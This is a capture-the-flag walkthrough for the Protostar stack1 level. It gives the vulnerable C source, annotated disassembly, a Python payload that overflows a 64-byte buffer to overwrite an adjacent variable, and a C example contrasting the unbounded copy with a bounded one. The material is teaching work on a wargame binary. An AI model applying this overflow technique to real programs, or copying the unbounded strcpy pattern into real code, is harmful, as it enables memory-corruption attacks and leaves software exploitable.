Binary Exploitation Protostar Stack1 - Walkthrough - Writeup

Hello Guyz,




In this post, I am going to show you how to beat Protostar stack1. Today's focus is variable overwriting: a simple technique for overwriting the value of a variable on the stack while the program is running.

Before starting this walkthrough, I want to highlight a few points.

  • I'm not the creator of the Protostar war game. I am just a player.
  • Here I am just providing hints and references, so if you get stuck anywhere, take a look here.


Source Code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>      /* errx() is declared here; the original listing omits it */

int main(int argc, char **argv)
{
  volatile int modified;   /* laid out directly after buffer on the stack */
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);   /* unbounded copy: the overflow this level is built around */

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

  return 0;
}




Hint provided by Exploit Exercises:

This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.

This level is at /opt/protostar/bin/stack1

If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend.
Protostar is little endian

Solution:

We simply need to overwrite the value of the modified variable on the stack.
Before starting, let's try to understand the situation on the stack. The offsets below are byte offsets from esp: buffer starts at esp+0x1c (28) and modified sits at esp+0x5c (92), so exactly 64 bytes separate them.


0                        28                                                      92        96
 ============================================================================================
        Other Things     |  Injectable Area                                      | modified | 
 ============================================================================================


Disassembly of main

   0x08048464 <+0>: push   ebp
   0x08048465 <+1>: mov    ebp,esp
   0x08048467 <+3>: and    esp,0xfffffff0
   0x0804846a <+6>: sub    esp,0x60                  << ====== 96 bytes (0x60) of stack reserved for locals and call arguments
   0x0804846d <+9>: cmp    DWORD PTR [ebp+0x8],0x1   << ====== compare argc with 1
   0x08048471 <+13>: jne    0x8048487 <main+35>   << ====== argc != 1: skip the errx() call
   0x08048473 <+15>: mov    DWORD PTR [esp+0x4],0x80485a0 
   0x0804847b <+23>: mov    DWORD PTR [esp],0x1
   0x08048482 <+30>: call   0x8048388 <errx@plt>
   0x08048487 <+35>: mov    DWORD PTR [esp+0x5c],0x0  << ===== modified = 0; the variable lives at esp+0x5c
   0x0804848f <+43>: mov    eax,DWORD PTR [ebp+0xc]   << ===== load argv (the char ** argument)
   0x08048492 <+46>: add    eax,0x4                  << ===== advance to &argv[1]
   0x08048495 <+49>: mov    eax,DWORD PTR [eax]      << ===== load the argv[1] pointer (our input string)
   0x08048497 <+51>: mov    DWORD PTR [esp+0x4],eax  << ===== second strcpy argument: the source
   0x0804849b <+55>: lea    eax,[esp+0x1c]           << ===== buffer starts at esp+0x1c (28): 64 bytes below modified
   0x0804849f <+59>: mov    DWORD PTR [esp],eax        << ===== first strcpy argument: the destination
   0x080484a2 <+62>: call   0x8048368 <strcpy@plt>   << ===== unbounded copy into buffer
   0x080484a7 <+67>: mov    eax,DWORD PTR [esp+0x5c]  << ===== reload modified after the copy
   0x080484ab <+71>: cmp    eax,0x61626364           << ===== compare with the target value
   0x080484b0 <+76>: jne    0x80484c0 <main+92>
   0x080484b2 <+78>: mov    DWORD PTR [esp],0x80485bc
   0x080484b9 <+85>: call   0x8048398 <puts@plt>
   0x080484be <+90>: jmp    0x80484d5 <main+113>
   0x080484c0 <+92>: mov    edx,DWORD PTR [esp+0x5c]
   0x080484c4 <+96>: mov    eax,0x80485f3
   0x080484c9 <+101>: mov    DWORD PTR [esp+0x4],edx
   0x080484cd <+105>: mov    DWORD PTR [esp],eax
   0x080484d0 <+108>: call   0x8048378 <printf@plt>
   0x080484d5 <+113>: leave  
   0x080484d6 <+114>: ret    



Exploit

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import struct
import sys

# Usage:  python3 exploit.py > tmp ; ./bin/stack1 "$(cat tmp)"

# 64 bytes fill buffer (esp+0x1c .. esp+0x5b); the next 4 bytes land on modified.
payload = b"a" * 64
# "<I" packs a 32-bit unsigned value little-endian, as Protostar expects:
# 0x61626364 becomes the bytes b"dcba".
payload += struct.pack("<I", 0x61626364)

# Write raw bytes, no trailing newline, so the shell passes them through unchanged.
sys.stdout.buffer.write(payload)



Very Easy! Hahaha.
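To make the layout and the fix concrete, here is an added example (not from the original post or from Protostar) that models stack1's frame as a struct, builds the same 68-byte input the Python script does, and shows the same copy done with a bound so modified cannot be reached. The struct layout is an assumption taken from the disassembly above (buffer at esp+0x1c, modified at esp+0x5c, nothing in between).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Frame model from the disassembly (assumption): buffer at esp+0x1c and
 * `modified` at esp+0x5c, so they are 64 bytes apart with nothing between. */
struct stack1_frame {
    char buffer[64];
    uint32_t modified;
};

/* The 68-byte input the page builds: 64 filler bytes, then the target
 * value in little-endian order (what struct.pack("<I") produces). */
size_t build_payload(unsigned char *out, uint32_t value)
{
    memset(out, 'a', 64);
    for (int i = 0; i < 4; i++)
        out[64 + i] = (unsigned char)(value >> (8 * i));
    return 68;
}

/* Unbounded copy, as stack1 does with strcpy: bytes past index 63 land on
 * `modified`.  memcpy over the whole struct keeps the spill inside one
 * object, so it is observable without undefined behaviour. */
uint32_t vulnerable_copy(const unsigned char *in, size_t len)
{
    struct stack1_frame f = { .modified = 0 };
    if (len > sizeof f) len = sizeof f;
    memcpy(&f, in, len);
    return f.modified;
}

/* Hardened copy: reject input that does not fit with its terminator,
 * so `modified` can never be reached through the buffer. */
uint32_t hardened_copy(const unsigned char *in, size_t len)
{
    struct stack1_frame f = { .modified = 0 };
    if (len < sizeof f.buffer) {
        memcpy(f.buffer, in, len);
        f.buffer[len] = '\0';
    }
    return f.modified;
}
int main(void)
{
    unsigned char payload[68];
    size_t n = build_payload(payload, 0x61626364);
    printf("vulnerable: 0x%08x  hardened: 0x%08x\n",
           vulnerable_copy(payload, n), hardened_copy(payload, n));
    return 0;
}
```

On a little-endian host the vulnerable model reports 0x61626364 while the bounded version leaves modified at 0 because the 68-byte input is refused outright.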


For a more detailed walkthrough, check the YouTube video playlist provided below.


